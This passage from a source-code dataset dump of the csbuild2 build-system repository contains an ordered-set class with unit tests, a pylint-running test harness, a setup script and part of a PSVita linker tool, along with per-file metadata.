ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: ordered_set\n\t:synopsis: Provides a set implementation that keeps a strong order\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport collections\nfrom .._testing import testcase\n\n\nclass OrderedSet(object):\n\t\"\"\"\n\tAn ordered set that keeps a strong order - all items inserted into the set remain in the set in the order they were inserted\n\tMuch like (and in fact, implemented in terms of) collections.OrderedDict\n\n\tOther than that, semantics are identical to set. For details on this class's functions, see pylib docs for set.\n\n\t:param iterable: An iterable to insert elements into the set\n\t:type iterable: anything iterable\n\t\"\"\"\n\t# pylint: disable=invalid-name,missing-docstring\n\tdef __init__(self, iterable=None):\n\t\tself.map = collections.OrderedDict()\n\t\tif iterable is not None:\n\t\t\tself.map.update([( x, None ) for x in iterable])\n\n\tdef __len__(self):\n\t\treturn len(self.map)\n\n\tdef __contains__(self, key):\n\t\treturn key in self.map\n\n\tdef union(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.update(other)\n\t\treturn ret\n\n\tdef intersection(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.intersection_update(other)\n\t\treturn ret\n\n\tdef difference(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.difference_update(other)\n\t\treturn ret\n\n\tdef symmetric_difference(self, other):\n\t\tret = OrderedSet(self.map.keys())\n\t\tret.symmetric_difference_update(other)\n\t\treturn ret\n\n\tdef __and__(self, other):\n\t\treturn self.intersection(other)\n\n\tdef __or__(self, other):\n\t\treturn self.union(other)\n\n\tdef __sub__(self, other):\n\t\treturn self.difference(other)\n\n\tdef __xor__(self, other):\n\t\treturn self.symmetric_difference(other)\n\n\tdef __iter__(self):\n\t\tfor key in self.map.keys():\n\t\t\tyield key\n\n\tdef __reversed__(self):\n\t\tfor key in reversed(list(self.map.keys())):\n\t\t\tyield key\n\n\tdef __repr__(self):\n\t\treturn \"{{{}}}\".format(\", \".join([repr(key) for key in self.map.keys()]))\n\n\tdef update(self, iterable):\n\t\tself.map.update([( x, None ) for x in iterable])\n\n\tdef intersection_update(self, iterable):\n\t\tfor key in list(self.map.keys()):\n\t\t\tif key not in iterable:\n\t\t\t\tdel self.map[key]\n\n\tdef difference_update(self, iterable):\n\t\tfor key in iterable:\n\t\t\tif key in self.map:\n\t\t\t\tdel self.map[key]\n\n\tdef symmetric_difference_update(self, iterable):\n\t\tfor key in iterable:\n\t\t\tif key in self.map:\n\t\t\t\tdel self.map[key]\n\t\t\telse:\n\t\t\t\tself.map[key] = None\n\n\tdef add(self, key):\n\t\tself.map[key] = None\n\n\tdef remove(self, key):\n\t\tdel self.map[key]\n\n\tdef discard(self, key):\n\t\ttry:\n\t\t\tdel self.map[key]\n\t\texcept:\n\t\t\tpass\n\n\tdef pop(self):\n\t\tkey = list(self.map.keys())[0]\n\t\tval = self.map[key]\n\t\tdel self.map[key]\n\t\treturn val\n\n\tdef clear(self):\n\t\tself.map = collections.OrderedDict()\n\n\nclass TestOrderedSet(testcase.TestCase):\n\t\"\"\"Test the ordered set\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self):\n\t\t\"\"\" Set up the test \"\"\"\n\t\tself.testset = OrderedSet([1,2])\n\t\tself.testset.add(3)\n\t\tself.testset.add(4)\n\n\tdef testLen(self):\n\t\t\"\"\"Test len\"\"\"\n\t\tself.assertEqual(4, len(self.testset))\n\n\tdef testContains(self):\n\t\t\"\"\"test contains\"\"\"\n\t\tself.assertIn(1, self.testset)\n\t\tself.assertIn(2, self.testset)\n\t\tself.assertIn(3, self.testset)\n\t\tself.assertIn(4, self.testset)\n\t\tself.assertNotIn(5, self.testset)\n\n\tdef testUnion(self):\n\t\t\"\"\"test union\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tunionset = self.testset.union(otherset)\n\t\tself.assertEqual(6, len(unionset))\n\t\tself.assertEqual(list(unionset), [1,2,3,4,6,5])\n\n\tdef testIntersection(self):\n\t\t\"\"\"test intersection\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tinterset = self.testset.intersection(otherset)\n\t\tself.assertEqual(2, len(interset))\n\t\tself.assertEqual(list(interset), [3,4])\n\n\tdef testDifference(self):\n\t\t\"\"\"test difference\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset.difference(otherset)\n\t\tself.assertEqual(2, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2])\n\n\tdef testSymmetricDifference(self):\n\t\t\"\"\"test symmetric difference\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset.symmetric_difference(otherset)\n\t\tself.assertEqual(4, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2,6,5])\n\n\tdef testAnd(self):\n\t\t\"\"\"test &\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tinterset = self.testset & otherset\n\t\tself.assertEqual(2, len(interset))\n\t\tself.assertEqual(list(interset), [3,4])\n\n\tdef testOr(self):\n\t\t\"\"\"test |\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tunionset = self.testset | otherset\n\t\tself.assertEqual(6, len(unionset))\n\t\tself.assertEqual(list(unionset), [1,2,3,4,6,5])\n\n\tdef testSub(self):\n\t\t\"\"\"test -\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset - otherset\n\t\tself.assertEqual(2, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2])\n\n\tdef testXor(self):\n\t\t\"\"\"test ^\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tdiffset = self.testset ^ otherset\n\t\tself.assertEqual(4, len(diffset))\n\t\tself.assertEqual(list(diffset), [1,2,6,5])\n\n\tdef testIter(self):\n\t\t\"\"\"test iteration\"\"\"\n\t\ttestList = [1,2,3,4]\n\t\ti = 0\n\n\t\tfor item in self.testset:\n\t\t\tself.assertEqual(testList[i], item)\n\t\t\ti += 1\n\n\tdef testReversed(self):\n\t\t\"\"\"test reverse\"\"\"\n\t\tself.assertEqual([4,3,2,1], list(reversed(self.testset)))\n\n\tdef testUpdate(self):\n\t\t\"\"\"test update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.update(otherset)\n\t\tself.assertEqual(6, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2,3,4,6,5])\n\n\tdef testIntersectionUpdate(self):\n\t\t\"\"\"test intersection update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.intersection_update(otherset)\n\t\tself.assertEqual(2, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [3,4])\n\n\tdef testDifferenceUpdate(self):\n\t\t\"\"\"test difference update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.difference_update(otherset)\n\t\tself.assertEqual(2, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2])\n\n\tdef testSymmetricDifferenceUpdate(self):\n\t\t\"\"\"test symmetric difference update\"\"\"\n\t\totherset = OrderedSet([6,5,4,3])\n\t\tself.testset.symmetric_difference_update(otherset)\n\t\tself.assertEqual(4, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2,6,5])\n\n\tdef testAdd(self):\n\t\t\"\"\"test add\"\"\"\n\t\tself.testset.add(5)\n\t\tself.testset.add(0)\n\t\tself.assertEqual(6, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,2,3,4,5,0])\n\n\tdef testRemove(self):\n\t\t\"\"\"test remove\"\"\"\n\t\tself.testset.remove(2)\n\t\tself.assertEqual(3, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,3,4])\n\n\tdef testDiscard(self):\n\t\t\"\"\"test discard\"\"\"\n\t\tself.testset.discard(2)\n\t\tself.testset.discard(0)\n\t\tself.assertEqual(3, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [1,3,4])\n\n\tdef testPop(self):\n\t\t\"\"\"test pop\"\"\"\n\t\tself.testset.pop()\n\t\tself.assertEqual(3, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [2,3,4])\n\n\tdef testClear(self):\n\t\t\"\"\"test clear\"\"\"\n\t\tself.testset.clear()\n\t\tself.assertEqual(0, len(self.testset))\n\t\tself.assertEqual(list(self.testset), [])\n" }, { "alpha_fraction": 0.6694461703300476, "alphanum_fraction": 0.672557532787323, "avg_line_length": 30.14341163635254, "blob_id": "42f5cbb97d9f3305d75c56e81f283a1bc7fef470", "content_id": "4033897f06071bd127a4d688c154b1ddfa006a17", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8035, "license_type": "permissive", "max_line_length": 145, "num_lines": 258, "path": "/csbuild/_testing/pylint_test.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: pylint_test\n\t:synopsis: Run pylint as part of the unit test framework\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport multiprocessing\nimport os\nimport subprocess\nimport sys\nimport traceback\nimport threading\nimport re\nimport unittest\n\nfrom . import testcase\nfrom .. import log\nfrom .._utils import thread_pool, PlatformString, queue, PlatformUnicode\n\nclass TestPylint(testcase.TestCase):\n\t\"\"\"Test to run pylint\"\"\"\n\t# pylint: disable=invalid-name\n\[email protected](sys.version_info.major < 3, \"Pylint is no longer supported on Python 2\")\n\tdef testPyLint(self):\n\t\t\"\"\"Run pylint on the code and ensure it passes all pylint checks\"\"\"\n\n\t\tcallbackQueue = queue.Queue()\n\t\tlog.SetCallbackQueue(callbackQueue)\n\t\tpool = thread_pool.ThreadPool(multiprocessing.cpu_count(), callbackQueue, stopOnException=False)\n\n\t\tenv = dict(os.environ)\n\t\tenv[PlatformString('PYTHONPATH')] = os.pathsep.join(sys.path)\n\n\t\tfd = subprocess.Popen([sys.executable, \"csbuild/_testing/run_pylint.py\", \"--version\"], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\t\tout, err = fd.communicate()\n\t\tif err:\n\t\t\tlog.Error(err)\n\t\tif out:\n\t\t\tlog.Info(out)\n\n\t\tfailedLints = set()\n\t\tlock = threading.Lock()\n\n\t\tansiEscape = re.compile(r'\\x1b[^m]*m')\n\t\tdef _parseAndRejigger(module, data):\n\t\t\tout = []\n\t\t\tdata = PlatformUnicode(data)\n\t\t\tdata = ansiEscape.sub('', data)\n\t\t\tfor line in data.splitlines():\n\t\t\t\tmatch = re.match(R\".:\\s*(\\d+),\\s*\\d+: (.+)\", line)\n\t\t\t\tif not match:\n\t\t\t\t\tmatch = re.match(R\".+:(\\d+):\\d+: (.+)\", line)\n\t\t\t\tif match:\n\t\t\t\t\tout.append(' File \"{}\", line {}, in pylint\\n {}'.format(os.path.abspath(module), match.group(1), match.group(2)))\n\t\t\t\telse:\n\t\t\t\t\t# Recent versions of pylint annoyingly print these lines about the config file to stderr and while\n\t\t\t\t\t# there is an option internally to silence these messages, there is no switch available externally\n\t\t\t\t\t# for configuring it. This means we need to check for those messages manually and discard them.\n\t\t\t\t\tif not line.startswith(\"Using config file \") and line != \"No config file found, using default configuration\":\n\t\t\t\t\t\tout.append(line)\n\t\t\treturn \"\\n\".join(out) + \"\\n\" if out else \"\"\n\n\t\tdef _runPylint(module):\n\t\t\tlog.Info(\"Linting module {}\", module)\n\t\t\tmoduleFullPath = os.path.abspath(module)\n\t\t\tfd = subprocess.Popen([sys.executable, \"csbuild/_testing/run_pylint.py\", module], stdout=subprocess.PIPE, stderr=subprocess.PIPE, env=env)\n\t\t\tout, err = fd.communicate()\n\t\t\tif err:\n\t\t\t\terr = _parseAndRejigger(moduleFullPath, err)\n\t\t\t\tif err:\n\t\t\t\t\tlog.Error(\"LINTING {}:\\n\\n{}\", module, PlatformString(err))\n\t\t\tif out:\n\t\t\t\tout = _parseAndRejigger(moduleFullPath, out)\n\t\t\t\tif out:\n\t\t\t\t\tlog.Error(\"LINTING {}:\\n\\n{}\", module, PlatformString(out))\n\t\t\tif fd.returncode != 0:\n\t\t\t\t#pylint: disable=not-context-manager\n\t\t\t\twith lock:\n\t\t\t\t\tfailedLints.add(module)\n\t\t\tself.assertEqual(0, fd.returncode)\n\n\t\tclass _sharedLocals(object):\n\t\t\tcount = 0\n\t\t\tdone = 0\n\n\t\tdef _checkDone():\n\t\t\t_sharedLocals.done += 1\n\t\t\tlog.Info(\"-- Completed {} out of {} lintings\", _sharedLocals.done, _sharedLocals.count)\n\t\t\tif _sharedLocals.count == _sharedLocals.done:\n\t\t\t\tpool.Stop()\n\n\t\tresultMTime = 0\n\t\tif os.access(\"failedLints.txt\", os.F_OK):\n\t\t\tresultMTime = os.path.getmtime(\"failedLints.txt\")\n\n\t\tfailedLints = set()\n\n\t\tif os.access(\"failedLints.txt\", os.F_OK):\n\t\t\twith open(\"failedLints.txt\", \"r\") as f:\n\t\t\t\tfailedLints = set(f.readlines())\n\n\n\t\timportRegex = re.compile(R\"import (.*)\")\n\t\tfromImportRegex = re.compile(R\"from (.*) import (.*)\")\n\t\tdotsRegex = re.compile(R\"(\\.+)(.*)\")\n\t\trelintMemo = {}\n\n\t\tdef _getModuleOrPackageInit(pkg):\n\t\t\tif os.access(pkg + \".py\", os.F_OK):\n\t\t\t\treturn pkg + \".py\"\n\n\t\t\tif not os.access(pkg, os.F_OK):\n\t\t\t\treturn None\n\n\t\t\tif os.path.isdir(pkg):\n\t\t\t\tpkg = os.path.join(pkg, \"__init__.py\")\n\t\t\t\tif not os.access(pkg, os.F_OK):\n\t\t\t\t\treturn None\n\t\t\treturn pkg\n\n\t\t# Ignore python virtual environments.\n\t\tfileDiscardRegex = re.compile(r\"venv[\\d\\s\\w]*[\\\\/]\", 0)\n\n\t\tdef _shouldRelint(filename):\n\t\t\tif fileDiscardRegex.match(filename):\n\t\t\t\treturn False\n\t\t\tif filename in failedLints:\n\t\t\t\treturn True\n\t\t\tif filename in relintMemo:\n\t\t\t\tshouldRelint = relintMemo[filename]\n\t\t\telse:\n\t\t\t\tshouldRelint = os.path.getmtime(filename) > resultMTime\n\t\t\t\trelintMemo[filename] = shouldRelint\n\n\t\t\tif shouldRelint:\n\t\t\t\treturn True\n\n\t\t\twith open(filename, \"r\") as f:\n\t\t\t\tfor line in f.readlines():\n\t\t\t\t\tline = line.strip()\n\t\t\t\t\tmatch = importRegex.match(line)\n\t\t\t\t\tpkg = None\n\t\t\t\t\tif match:\n\t\t\t\t\t\treplaced = match.group(1).replace(\".\", os.path.sep)\n\t\t\t\t\t\tpkg = _getModuleOrPackageInit(os.path.join(os.path.dirname(filename), replaced))\n\n\t\t\t\t\t\tif pkg is None:\n\t\t\t\t\t\t\tpkg = _getModuleOrPackageInit(replaced)\n\t\t\t\t\telse:\n\t\t\t\t\t\tmatch = fromImportRegex.match(line)\n\t\t\t\t\t\tif match:\n\t\t\t\t\t\t\tpkg = match.group(1)\n\t\t\t\t\t\t\tif pkg == \"__future__\":\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\t\tif pkg.startswith(\"csbuild\"):\n\t\t\t\t\t\t\t\tpkg = pkg.replace(\".\", os.sep)\n\t\t\t\t\t\t\telif pkg.startswith(\".\"):\n\t\t\t\t\t\t\t\tdotmatch = dotsRegex.match(pkg)\n\t\t\t\t\t\t\t\tstartDots = dotmatch.group(1)[1:]\n\t\t\t\t\t\t\t\tend = dotmatch.group(2).replace(\".\", os.sep)\n\t\t\t\t\t\t\t\tpkg = os.path.join(os.path.dirname(filename), startDots.replace(\".\", \"../\") + end)\n\t\t\t\t\t\t\tpkg = _getModuleOrPackageInit(os.path.normpath(pkg))\n\n\t\t\t\t\tif pkg is not None:\n\t\t\t\t\t\tif pkg in failedLints:\n\t\t\t\t\t\t\treturn resultMTime + 1\n\n\t\t\t\t\t\tif pkg in relintMemo:\n\t\t\t\t\t\t\tshouldRelint = relintMemo[pkg]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tshouldRelint = _shouldRelint(pkg)\n\t\t\t\t\t\t\trelintMemo[pkg] = shouldRelint\n\n\t\t\t\t\t\tif shouldRelint:\n\t\t\t\t\t\t\treturn True\n\t\t\treturn False\n\n\t\trepoRootPath = os.getcwd()\n\t\tfor root, _, files in os.walk(repoRootPath):\n\t\t\troot = os.path.relpath(root, repoRootPath)\n\n\t\t\t# Discard directories that begin with '.'\n\t\t\tif len(root) > 1 and root.startswith(\".\"):\n\t\t\t\tcontinue\n\n\t\t\tfor filename in files:\n\t\t\t\t# Discard files that begin with '.'\n\t\t\t\tif filename.startswith(\".\"):\n\t\t\t\t\tcontinue\n\n\t\t\t\tif filename.endswith(\".py\"):\n\t\t\t\t\tfinalfile = os.path.normpath(os.path.join(root, filename))\n\n\t\t\t\t\tif _shouldRelint(finalfile):\n\t\t\t\t\t\t_sharedLocals.count += 1\n\t\t\t\t\t\tpool.AddTask((_runPylint, finalfile), _checkDone)\n\n\t\tif _sharedLocals.count == 0:\n\t\t\treturn\n\n\t\tfailedLints = set()\n\t\tpool.Start()\n\t\terrors = False\n\n\t\twhile True:\n\t\t\tcb = callbackQueue.GetBlocking()\n\n\t\t\tif cb is thread_pool.ThreadPool.exitEvent:\n\t\t\t\tbreak\n\t\t\ttoReraise = None\n\t\t\ttry:\n\t\t\t\tcb()\n\t\t\texcept thread_pool.ThreadedTaskException as e:\n\t\t\t\ttoReraise = e\n\n\t\t\tif toReraise:\n\t\t\t\ttry:\n\t\t\t\t\ttoReraise.Reraise()\n\t\t\t\texcept AssertionError:\n\t\t\t\t\tpass\n\t\t\t\texcept:\n\t\t\t\t\tlog.Error(traceback.format_exc())\n\t\t\t\t\terrors = True\n\n\t\tlog.SetCallbackQueue(None)\n\n\t\twith open(\"failedLints.txt\", \"w\") as f:\n\t\t\tf.write(\"\\n\".join(failedLints))\n\n\t\tif failedLints:\n\t\t\tlog.Error(\"The following modules failed to lint:\")\n\t\t\tfor module in failedLints:\n\t\t\t\tlog.Error(\" {}\", module)\n\t\t\tself.fail(\"{} files failed to lint: {}\".format(len(failedLints), failedLints))\n\n\t\tif errors:\n\t\t\tself.fail(\"Exceptions were thrown during the test\")\n" }, { "alpha_fraction": 0.7122986912727356, "alphanum_fraction": 0.7196193337440491, "avg_line_length": 37.47887420654297, "blob_id": "9500382a436b8c3658dbad2d9e809ce1cf56ed13", "content_id": "2a4a10048513f71eafdb86291c488760f84e1154", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2732, "license_type": "no_license", "max_line_length": 195, "num_lines": 71, "path": "/setup.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: setup\n\t:synopsis: Setup script for csbuild.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom setuptools import setup\n\nwith open(\"csbuild/version\", \"r\") as f:\n\tcsbuildVersion = f.read().strip()\n\nsetup(\n\tname = \"csbuild\",\n\tversion = csbuildVersion,\n\tpackages = [\"csbuild\"],\n\tinclude_package_data = True,\n\tauthor = \"Sleeping Cat, LLC\",\n\tauthor_email = \"[email protected]\",\n\turl = \"https://github.com/SleepingCatGames/csbuild2\",\n\tdescription = \"Programming language-agnostic build system\",\n\tlong_description = \"\"\"CSBuild is a language-agnostic build system focused on maximizing developer iteration time and providing tools for enabling developers to improve their build workflow. \"\"\",\n\tclassifiers = [\n\t\t\"Development Status :: 2 - Pre-Alpha\",\n\t\t\"Environment :: Console\",\n\t\t\"Intended Audience :: Developers\",\n\t\t\"License :: OSI Approved :: MIT License\",\n\t\t\"Natural Language :: English\",\n\t\t\"Operating System :: Microsoft :: Windows\",\n\t\t\"Operating System :: MacOS :: MacOS X\",\n\t\t\"Operating System :: POSIX :: Linux\",\n\t\t\"Programming Language :: Assembly\",\n\t\t\"Programming Language :: C\",\n\t\t\"Programming Language :: C++\",\n\t\t\"Programming Language :: Java\",\n\t\t\"Programming Language :: Objective C\",\n\t\t\"Programming Language :: Python :: 2.7\",\n\t\t\"Programming Language :: Python :: 3.4\",\n\t\t\"Programming Language :: Python :: 3.5\",\n\t\t\"Programming Language :: Python :: 3.6\",\n\t\t\"Programming Language :: Python :: 3.7\",\n\t\t\"Programming Language :: Python :: 3.8\",\n\t\t\"Programming Language :: Python :: 3.9\",\n\t\t\"Topic :: Software Development :: Build Tools\",\n\t],\n\tinstall_requires = [\n\t\t\"graphviz\",\n\t],\n)\n" }, { "alpha_fraction": 0.6735913753509521, "alphanum_fraction": 0.6747870445251465, "avg_line_length": 33.13775634765625, "blob_id": "cb133029e8e63b74ecd70726cab4f322cf806fca", "content_id": "3b6637c8a7b4e7616231f1aa4de41f3122c7b639", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6691, "license_type": "no_license", "max_line_length": 117, "num_lines": 196, "path": "/csbuild/tools/linkers/psvita_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: psvita_linker\n\t:synopsis: Implementation of the PSVita linker tool.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .linker_base import LinkerBase\n\nfrom ..common import FindLibraries\nfrom ..common.sony_tool_base import PsVitaBaseTool\n\nfrom ... import log\nfrom ..._utils import response_file, shared_globals\n\nclass PsVitaLinker(PsVitaBaseTool, LinkerBase):\n\t\"\"\"\n\tPSVita linker tool implementation.\n\t\"\"\"\n\tsupportedArchitectures = { \"arm\" }\n\n\tinputGroups = { \".o\" }\n\toutputFiles = { \".self\", \".a\", \".suprx\" }\n\tcrossProjectDependencies = { \".a\", \".suprx\" }\n\n\tdef __init__(self, projectSettings):\n\t\tPsVitaBaseTool.__init__(self, projectSettings)\n\t\tLinkerBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tPsVitaBaseTool.SetupForProject(self, project)\n\t\tLinkerBase.SetupForProject(self, project)\n\n\tdef _getOutputFiles(self, project):\n\t\tprojectOutputName = project.outputName\n\n\t\t# PSVita requires that libraries being with the \"lib\" prefix.\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary and not projectOutputName.startswith(\"lib\"):\n\t\t\tprojectOutputName = \"lib{}\".format(projectOutputName)\n\n\t\toutputFilename = \"{}{}\".format(projectOutputName, self._getOutputExtension(project.projectType))\n\t\toutputFullPath = os.path.join(project.outputDir, outputFilename)\n\t\toutputFiles = [outputFullPath]\n\n\t\t# For shared libraries, the linker will automatically generate a stub library that can be linked against.\n\t\t# Note the stub will only be generated if something in the project is being exported. But, since dynamic\n\t\t# loading at runtime isn't possible, such a project would be pointless, so we can assume the developer will\n\t\t# always export something.\n\t\tif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\toutputFiles.extend([\n\t\t\t\tos.path.join(project.outputDir, \"{}_stub.a\".format(projectOutputName)),\n\t\t\t])\n\n\t\treturn tuple(outputFiles)\n\n\tdef _getCommand(self, project, inputFiles):\n\t\tif project.projectType == csbuild.ProjectType.StaticLibrary:\n\t\t\tuseResponseFile = False\n\t\t\tcmdExe = self._getArchiverName()\n\t\t\tcmd = [\"rcs\"] \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles)\n\t\telse:\n\t\t\tuseResponseFile = True\n\t\t\tcmdExe = self._getLinkerName()\n\t\t\tcmd = self._getDefaultArgs(project) \\\n\t\t\t\t+ self._getCustomLinkerArgs() \\\n\t\t\t\t+ self._getOutputFileArgs(project) \\\n\t\t\t\t+ self._getInputFileArgs(inputFiles) \\\n\t\t\t\t+ self._getLibraryPathArgs() \\\n\t\t\t\t+ self._getStartGroupArgs() \\\n\t\t\t\t+ self._getLibraryArgs() \\\n\t\t\t\t+ self._getEndGroupArgs()\n\n\t\tif useResponseFile:\n\t\t\tresponseFile = response_file.ResponseFile(project, \"linker-{}\".format(project.outputName), cmd)\n\n\t\t\tif shared_globals.showCommands:\n\t\t\t\tlog.Command(\"ResponseFile: {}\\n\\t{}\".format(responseFile.filePath, responseFile.AsString()))\n\n\t\t\tcmd = [cmdExe, \"@{}\".format(responseFile.filePath)]\n\n\t\telse:\n\t\t\tcmd = [cmdExe] + cmd\n\n\t\treturn cmd\n\n\tdef _findLibraries(self, project, libs):\n\t\ttargetLibPath = os.path.join(self._psVitaSdkPath, \"target\", \"lib\")\n\t\tallLibraryDirectories = list(self._libraryDirectories) + [targetLibPath]\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".suprx\", \".a\"])\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.Application: \".self\",\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".suprx\",\n\t\t\tcsbuild.ProjectType.StaticLibrary: \".a\",\n\t\t}.get(projectType, None)\n\n\t\treturn outputExt\n\n\n\t####################################################################################################################\n\t### Internal methods\n\t####################################################################################################################\n\n\tdef _getLinkerName(self):\n\t\tbinPath = os.path.join(self._psVitaSdkPath, \"host_tools\", \"build\", \"bin\")\n\t\texeName = \"psp2ld.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getArchiverName(self):\n\t\tbinPath = os.path.join(self._psVitaSdkPath, \"host_tools\", \"build\", \"bin\")\n\t\texeName = \"psp2snarl.exe\"\n\n\t\treturn os.path.join(binPath, exeName)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = []\n\t\tif project.projectType == 